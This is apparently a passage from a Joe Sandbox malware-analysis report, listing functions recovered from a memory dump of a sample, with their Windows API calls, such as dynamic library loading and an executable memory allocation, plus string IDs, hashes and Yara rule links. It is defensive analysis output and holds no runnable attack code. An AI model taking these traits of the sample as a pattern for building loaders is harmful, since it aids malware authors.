                                Download Yara Rule
                                APIs
                                • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013,?,?,SysTreeView32,00CFDBF0,00000000,?,?,?,?), ref: 00CCA4E6
                                • GetWindowLongW.USER32 ref: 00CCA503
                                • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00CCA513
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1366168396.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                • Associated: 00000000.00000002.1366154772.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366214595.0000000000CED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366214595.0000000000D0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366250034.0000000000D1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366263944.0000000000D24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c60000_3T-ENQ-O-2024-10856.jbxd
                                Similarity
                                • API ID: Window$Long
                                • String ID: SysTreeView32
                                • API String ID: 847901565-1698111956
                                • Opcode ID: bcaab2430a79ee8975b4b3cd5b9882c89309dff529aeb8be0b4a7991abdcb864
                                • Instruction ID: 3d729cfe2ef63bf0bc025c57c461e2a1ca66f284fc6dcfdaf34a4012eb6504c1
                                • Opcode Fuzzy Hash: bcaab2430a79ee8975b4b3cd5b9882c89309dff529aeb8be0b4a7991abdcb864
                                • Instruction Fuzzy Hash: 3431A031100609AFDB259E78CC49FEA7BA9EB49328F208728F975922E0D770E9519B51
                                Function 00CCA698 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 88windowCOMMON
                                Download Yara Rule
                                APIs
                                • SendMessageW.USER32(00000000,00000469,?,00000000), ref: 00CCA74F
                                • SendMessageW.USER32(00000000,00000465,00000000,80017FFF), ref: 00CCA75D
                                • DestroyWindow.USER32(00000000,00000000,?,?,?,00000000,msctls_updown32,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 00CCA764
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1366168396.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                • Associated: 00000000.00000002.1366154772.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366214595.0000000000CED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366214595.0000000000D0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366250034.0000000000D1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366263944.0000000000D24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c60000_3T-ENQ-O-2024-10856.jbxd
                                Similarity
                                • API ID: MessageSend$DestroyWindow
                                • String ID: msctls_updown32
                                • API String ID: 4014797782-2298589950
                                • Opcode ID: 03124250e14bf4eacf5645029f35108f34674ab0a08ad10b903f5ec68e60c4c7
                                • Instruction ID: 3ad2fe9ebe52e0e0b96b64238148cabb3149be318f5c8ab25f006b88965e0d77
                                • Opcode Fuzzy Hash: 03124250e14bf4eacf5645029f35108f34674ab0a08ad10b903f5ec68e60c4c7
                                • Instruction Fuzzy Hash: C4218BB5600209AFDB10DF64CCC5FA777ADEB5A398B040419FA119B361CB70EC119BA1
                                Function 00CC97B2 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84windowCOMMON
                                Download Yara Rule
                                APIs
                                • SendMessageW.USER32(00000000,00000180,00000000,?), ref: 00CC983D
                                • SendMessageW.USER32(?,00000186,00000000,00000000), ref: 00CC984D
                                • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,Listbox,00000000,00000000,?,?,?,?,?), ref: 00CC9872
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1366168396.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                • Associated: 00000000.00000002.1366154772.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366214595.0000000000CED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366214595.0000000000D0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366250034.0000000000D1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366263944.0000000000D24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c60000_3T-ENQ-O-2024-10856.jbxd
                                Similarity
                                • API ID: MessageSend$MoveWindow
                                • String ID: Listbox
                                • API String ID: 3315199576-2633736733
                                • Opcode ID: d986bd3675a21a25c08cc0907d494c08b4ff4902ab18f94bca7c8d33734a7609
                                • Instruction ID: f47c5f82eeecd48ba438e1dfe5e154aa79bc1a3af3eb1e7970e10db5f5f85d61
                                • Opcode Fuzzy Hash: d986bd3675a21a25c08cc0907d494c08b4ff4902ab18f94bca7c8d33734a7609
                                • Instruction Fuzzy Hash: EC21C632610158BFEF118F54DC89FBB3BAEEF8AB54F018128F9159B190C6719D51DBA0
                                Function 00CCA217 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 66windowCOMMON
                                Download Yara Rule
                                APIs
                                • SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 00CCA27B
                                • SendMessageW.USER32(?,00000406,00000000,00640000), ref: 00CCA290
                                • SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 00CCA29D
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1366168396.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                • Associated: 00000000.00000002.1366154772.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366214595.0000000000CED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366214595.0000000000D0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366250034.0000000000D1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366263944.0000000000D24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c60000_3T-ENQ-O-2024-10856.jbxd
                                Similarity
                                • API ID: MessageSend
                                • String ID: msctls_trackbar32
                                • API String ID: 3850602802-1010561917
                                • Opcode ID: b08ac2de064f9f99c1d49205457304653ea0befd6efb80eee5f79ca7b09476fb
                                • Instruction ID: f6f53ce401550d3e1f3e186650978beb9a85b59233fb6292ca34eb0499609c2b
                                • Opcode Fuzzy Hash: b08ac2de064f9f99c1d49205457304653ea0befd6efb80eee5f79ca7b09476fb
                                • Instruction Fuzzy Hash: 7511E771240308BFDB205F65DC46F9B3B69EF89B58F01411CFA55A6090D672D851DB60
                                Function 00C82F5F Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 24libraryloaderCOMMONLIBRARYCODE
                                Download Yara Rule
                                APIs
                                • LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoInitialize,00C83028,?), ref: 00C82F79
                                • GetProcAddress.KERNEL32(00000000), ref: 00C82F80
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1366168396.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                • Associated: 00000000.00000002.1366154772.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366214595.0000000000CED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366214595.0000000000D0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366250034.0000000000D1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366263944.0000000000D24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c60000_3T-ENQ-O-2024-10856.jbxd
                                Similarity
                                • API ID: AddressLibraryLoadProc
                                • String ID: RoInitialize$combase.dll
                                • API String ID: 2574300362-340411864
                                • Opcode ID: bf69e2fb1df2f035e893820741d17a739d5522bf16053dc9878b56ea165da401
                                • Instruction ID: 4ec7b641bdf15950a403291440989f23298c6eb9f09a46d6c34eeeb7a011c0da
                                • Opcode Fuzzy Hash: bf69e2fb1df2f035e893820741d17a739d5522bf16053dc9878b56ea165da401
                                • Instruction Fuzzy Hash: 1BE04F70694351AFDB216FB5ED8DB593A68B71474AF004034F213D52E1CBB54592DF28
                                Function 00C83034 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 19libraryloaderCOMMONLIBRARYCODE
                                Download Yara Rule
                                APIs
                                • LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoUninitialize,00C82F4E), ref: 00C8304E
                                • GetProcAddress.KERNEL32(00000000), ref: 00C83055
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1366168396.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                • Associated: 00000000.00000002.1366154772.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366214595.0000000000CED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366214595.0000000000D0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366250034.0000000000D1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366263944.0000000000D24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c60000_3T-ENQ-O-2024-10856.jbxd
                                Similarity
                                • API ID: AddressLibraryLoadProc
                                • String ID: RoUninitialize$combase.dll
                                • API String ID: 2574300362-2819208100
                                • Opcode ID: 435f2d13239d7fbd4ee1689ae8fd1a68dbfd10db60e6ffb88c4a32d40efa3be7
                                • Instruction ID: 4e5fa70a3b598bfd0618d8d5f9276c770d2e7cecf74f363e535904db8f6d8120
                                • Opcode Fuzzy Hash: 435f2d13239d7fbd4ee1689ae8fd1a68dbfd10db60e6ffb88c4a32d40efa3be7
                                • Instruction Fuzzy Hash: 59E0EC70645380EFDB325F61EE0EB493E64B714B46F101024F51AD52B9CFB54611DB39
                                Function 00CDBA51 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 17timeCOMMON
                                Download Yara Rule
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1366168396.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                • Associated: 00000000.00000002.1366154772.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366214595.0000000000CED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366214595.0000000000D0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366250034.0000000000D1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366263944.0000000000D24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c60000_3T-ENQ-O-2024-10856.jbxd
                                Similarity
                                • API ID: LocalTime__swprintf
                                • String ID: %.3d$WIN_XPe
                                • API String ID: 2070861257-2409531811
                                • Opcode ID: 37056bc5abef128d28dff4e67776558f118960cb7b264f0894d176c6fc625ccf
                                • Instruction ID: 1ea0da15d05309dc4f28d95273b8870eb6d8add432db94ae2303d958caa9654e
                                • Opcode Fuzzy Hash: 37056bc5abef128d28dff4e67776558f118960cb7b264f0894d176c6fc625ccf
                                • Instruction Fuzzy Hash: B6E0127180801CFBC754D6929C46AFE73BCAB08300F5184D3BA1E92100D7359F94BB26
                                Function 00C7E6E3 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15libraryloaderCOMMON
                                Download Yara Rule
                                APIs
                                • LoadLibraryA.KERNEL32(kernel32.dll,?,00C7E6D9,?,00C7E55B,00CFDC28,?,?), ref: 00C7E6F1
                                • GetProcAddress.KERNEL32(00000000,IsWow64Process), ref: 00C7E703
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1366168396.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                • Associated: 00000000.00000002.1366154772.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366214595.0000000000CED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366214595.0000000000D0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366250034.0000000000D1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366263944.0000000000D24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c60000_3T-ENQ-O-2024-10856.jbxd
                                Similarity
                                • API ID: AddressLibraryLoadProc
                                • String ID: IsWow64Process$kernel32.dll
                                • API String ID: 2574300362-3024904723
                                • Opcode ID: 41c255567ba957346262f62ffc8bd8342df4fa3cc53c63df899c129f4931b6bc
                                • Instruction ID: 19c77b3bc30ee685fc1c4db74962fb7483eeb659d82e68718131d307591db27a
                                • Opcode Fuzzy Hash: 41c255567ba957346262f62ffc8bd8342df4fa3cc53c63df899c129f4931b6bc
                                • Instruction Fuzzy Hash: 34D0A7355003529FD7242F20F88C75B3BD4BB08310B00945DF4AAD2150DB70C4D08720
                                Function 00C7E6A6 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15libraryloaderCOMMON
                                Download Yara Rule
                                APIs
                                • LoadLibraryA.KERNEL32(kernel32.dll,?,00C7E69C,756F0AE0,00C7E5AC,00CFDC28,?,?), ref: 00C7E6B4
                                • GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 00C7E6C6
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1366168396.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                • Associated: 00000000.00000002.1366154772.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366214595.0000000000CED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366214595.0000000000D0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366250034.0000000000D1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366263944.0000000000D24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c60000_3T-ENQ-O-2024-10856.jbxd
                                Similarity
                                • API ID: AddressLibraryLoadProc
                                • String ID: GetNativeSystemInfo$kernel32.dll
                                • API String ID: 2574300362-192647395
                                • Opcode ID: 17f272509e5d410fd25c200bd362608981fab4f835e4fc6cb2c39daf164ff024
                                • Instruction ID: 7ea632359a1ab5b457e7cc7657fa3600924e261756379d49911406f62a31832d
                                • Opcode Fuzzy Hash: 17f272509e5d410fd25c200bd362608981fab4f835e4fc6cb2c39daf164ff024
                                • Instruction Fuzzy Hash: 76D0A7354003529FD7205F30F85875A36D4AB28311B00A45DF45AD1170DB70D4D08760
                                Function 00CBEBB9 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15libraryloaderCOMMON
                                Download Yara Rule
                                APIs
                                • LoadLibraryA.KERNEL32(kernel32.dll,?,00CBEBAF,?,00CBEAAC), ref: 00CBEBC7
                                • GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryW), ref: 00CBEBD9
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1366168396.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                • Associated: 00000000.00000002.1366154772.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366214595.0000000000CED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366214595.0000000000D0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366250034.0000000000D1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366263944.0000000000D24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c60000_3T-ENQ-O-2024-10856.jbxd
                                Similarity
                                • API ID: AddressLibraryLoadProc
                                • String ID: GetSystemWow64DirectoryW$kernel32.dll
                                • API String ID: 2574300362-1816364905
                                • Opcode ID: c74aaae430bc43d222f2aea47f94feb62f76cde23eb29a721a263631c612e1f3
                                • Instruction ID: 3591da14a087429d15d69deb5fb6d1251b04da8050eb9f3c76053f482b6907d4
                                • Opcode Fuzzy Hash: c74aaae430bc43d222f2aea47f94feb62f76cde23eb29a721a263631c612e1f3
                                • Instruction Fuzzy Hash: E4D0C7745047529FD7205F75F888BD976D4AF18715F10982DF467D1150DFB0D8C48764
                                Function 00CA13A6 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15libraryloaderCOMMON
                                Download Yara Rule
                                APIs
                                • LoadLibraryA.KERNEL32(oleaut32.dll,00000000,00CA1371,?,00CA1519), ref: 00CA13B4
                                • GetProcAddress.KERNEL32(00000000,UnRegisterTypeLibForUser), ref: 00CA13C6
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1366168396.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                • Associated: 00000000.00000002.1366154772.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366214595.0000000000CED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366214595.0000000000D0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366250034.0000000000D1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366263944.0000000000D24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c60000_3T-ENQ-O-2024-10856.jbxd
                                Similarity
                                • API ID: AddressLibraryLoadProc
                                • String ID: UnRegisterTypeLibForUser$oleaut32.dll
                                • API String ID: 2574300362-1587604923
                                • Opcode ID: b34e6fbeee0fad78aed027b9c02e00f07d6538d964e10fe60fa5bd9ccc52ce5b
                                • Instruction ID: f95f3a1f8de1cb6769b1f15a09893b014408c033de5b03b968763c37f3134bd9
                                • Opcode Fuzzy Hash: b34e6fbeee0fad78aed027b9c02e00f07d6538d964e10fe60fa5bd9ccc52ce5b
                                • Instruction Fuzzy Hash: 74D0A730440313AFDB200F25F84874D36E8AF4431DF04541DE866D5570DE70C5C88720
                                Function 00CA137B Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15libraryloaderCOMMON
                                Download Yara Rule
                                APIs
                                • LoadLibraryA.KERNEL32(oleaut32.dll,?,00CA135F,?,00CA1440), ref: 00CA1389
                                • GetProcAddress.KERNEL32(00000000,RegisterTypeLibForUser), ref: 00CA139B
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1366168396.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                • Associated: 00000000.00000002.1366154772.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366214595.0000000000CED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366214595.0000000000D0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366250034.0000000000D1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366263944.0000000000D24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c60000_3T-ENQ-O-2024-10856.jbxd
                                Similarity
                                • API ID: AddressLibraryLoadProc
                                • String ID: RegisterTypeLibForUser$oleaut32.dll
                                • API String ID: 2574300362-1071820185
                                • Opcode ID: 4e15156a35d87e18befb5ef38c126c96fc0f81ddfbaa364c5487d1e11a96d278
                                • Instruction ID: 467b8dbdb5af92c0873f91dda00e4637c2ecb55f3ccee9312992898cbab01378
                                • Opcode Fuzzy Hash: 4e15156a35d87e18befb5ef38c126c96fc0f81ddfbaa364c5487d1e11a96d278
                                • Instruction Fuzzy Hash: AFD0A770900313BFDB204F24F84878936D4AF08319F08441DE896D1560DA70C5C48720
                                Function 00CC3ACC Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15libraryloaderCOMMON
                                Download Yara Rule
                                APIs
                                • LoadLibraryA.KERNEL32(advapi32.dll,?,00CC3AC2,?,00CC3CF7), ref: 00CC3ADA
                                • GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 00CC3AEC
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1366168396.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                • Associated: 00000000.00000002.1366154772.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366214595.0000000000CED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366214595.0000000000D0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366250034.0000000000D1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366263944.0000000000D24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c60000_3T-ENQ-O-2024-10856.jbxd
                                Similarity
                                • API ID: AddressLibraryLoadProc
                                • String ID: RegDeleteKeyExW$advapi32.dll
                                • API String ID: 2574300362-4033151799
                                • Opcode ID: 0749d33963bf6c11449b70c2767d7127f3758cdc5e6187f12d95732c43fc6a6b
                                • Instruction ID: 7ce5b7606be1291408a0ba67a7d87e8d97d51d39065869931bd5899506c50b2e
                                • Opcode Fuzzy Hash: 0749d33963bf6c11449b70c2767d7127f3758cdc5e6187f12d95732c43fc6a6b
                                • Instruction Fuzzy Hash: C2D09E705007539ED7209BA5FC49B8976D4AB15715B10942DE4A692550EEB0C5848660
                                Function 00C9A8C8 Relevance: 6.3, APIs: 4, Instructions: 306COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000000.00000002.1366168396.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                • Associated: 00000000.00000002.1366154772.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366214595.0000000000CED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366214595.0000000000D0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366250034.0000000000D1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366263944.0000000000D24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c60000_3T-ENQ-O-2024-10856.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: af09252fb5f3a494c8ba6e2982d73191d68c58c3128ea09a602936a2f2685538
                                • Instruction ID: b850b9e818710c89105820e1ccaa9793c31e0a854010268a0d50f6a6cb35f991
                                • Opcode Fuzzy Hash: af09252fb5f3a494c8ba6e2982d73191d68c58c3128ea09a602936a2f2685538
                                • Instruction Fuzzy Hash: 55C18E75A00216EFCF14CF95C988EAEB7B5FF48700F104599E916AB251D730DE81DBA1
                                Function 00C6AA70 Relevance: 6.3, APIs: 4, Instructions: 300COMMON
                                Download Yara Rule
                                APIs
                                • CharUpperBuffW.USER32(00000000,?,00000000,00000001,00000000,00000000,?,?,00000000,?,?,00CB6AA6), ref: 00C6AB2D
                                • _wcscmp.LIBCMT ref: 00C6AB49
                                Memory Dump Source
                                • Source File: 00000000.00000002.1366168396.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                • Associated: 00000000.00000002.1366154772.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366214595.0000000000CED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366214595.0000000000D0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366250034.0000000000D1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366263944.0000000000D24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c60000_3T-ENQ-O-2024-10856.jbxd
                                Similarity
                                • API ID: BuffCharUpper_wcscmp
                                • String ID:
                                • API String ID: 820872866-0
                                • Opcode ID: 86db3a13bb030341dd4fb80cbca70c2c98d4d099fbf48149c39c2847fa36631a
                                • Instruction ID: f6bc2b686204184f66033a08c673105741b40960f2cbee81b0a7af6e94583e0b
                                • Opcode Fuzzy Hash: 86db3a13bb030341dd4fb80cbca70c2c98d4d099fbf48149c39c2847fa36631a
                                • Instruction Fuzzy Hash: 79A1347070010AEBDB24DF65E8C06BDB7A1FF44300F64816AEC56E3290DB319871EB56
                                Function 00CC0D01 Relevance: 6.3, APIs: 4, Instructions: 300memoryCOMMON
                                Download Yara Rule
                                APIs
                                • CharLowerBuffW.USER32(?,?), ref: 00CC0D85
                                • CharLowerBuffW.USER32(?,?), ref: 00CC0DC8
                                  • Part of subcall function 00CC0458: CharLowerBuffW.USER32(?,?,?,?), ref: 00CC0478
                                • VirtualAlloc.KERNEL32(00000000,00000077,00003000,00000040), ref: 00CC0FB2
                                • _memmove.LIBCMT ref: 00CC0FC2
                                Memory Dump Source
                                • Source File: 00000000.00000002.1366168396.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                • Associated: 00000000.00000002.1366154772.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366214595.0000000000CED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366214595.0000000000D0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366250034.0000000000D1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366263944.0000000000D24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c60000_3T-ENQ-O-2024-10856.jbxd
                                Similarity
                                • API ID: BuffCharLower$AllocVirtual_memmove
                                • String ID:
                                • API String ID: 3659485706-0
                                • Opcode ID: 1878851d3a240016897f1ab3c6e3fa6d07eba421f742b857828781c9b9410450
                                • Instruction ID: c9a921f6a551f3ab8b98ef95c8f008e8d18e31b9ea27881f51314dab2958e1f6
                                • Opcode Fuzzy Hash: 1878851d3a240016897f1ab3c6e3fa6d07eba421f742b857828781c9b9410450
                                • Instruction Fuzzy Hash: 2BB16D71604300DFC714DF28C880A6AB7E4EF89714F24896DF99A9B352DB31EE46DB91
                                Function 00CBAF26 Relevance: 6.3, APIs: 4, Instructions: 268COMMON
                                Download Yara Rule
                                APIs
                                • CoInitialize.OLE32(00000000), ref: 00CBAF56
                                • CoUninitialize.OLE32 ref: 00CBAF61
                                  • Part of subcall function 00CA1050: CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 00CA10B8
                                • VariantInit.OLEAUT32(?), ref: 00CBAF6C
                                • VariantClear.OLEAUT32(?), ref: 00CBB23F
                                Memory Dump Source
                                • Source File: 00000000.00000002.1366168396.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                • Associated: 00000000.00000002.1366154772.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366214595.0000000000CED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366214595.0000000000D0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366250034.0000000000D1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366263944.0000000000D24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c60000_3T-ENQ-O-2024-10856.jbxd
                                Similarity
                                • API ID: Variant$ClearCreateInitInitializeInstanceUninitialize
                                • String ID:
                                • API String ID: 780911581-0
                                • Opcode ID: b408fba0722dc163a040b26cc6e59f1b84fbee02c5c8f68f66d46f7fb512847c
                                • Instruction ID: 409bc2e0cce8ed4c014b06ddd6b9a25115260cc1b1b2b1f66a19b323848e7a22
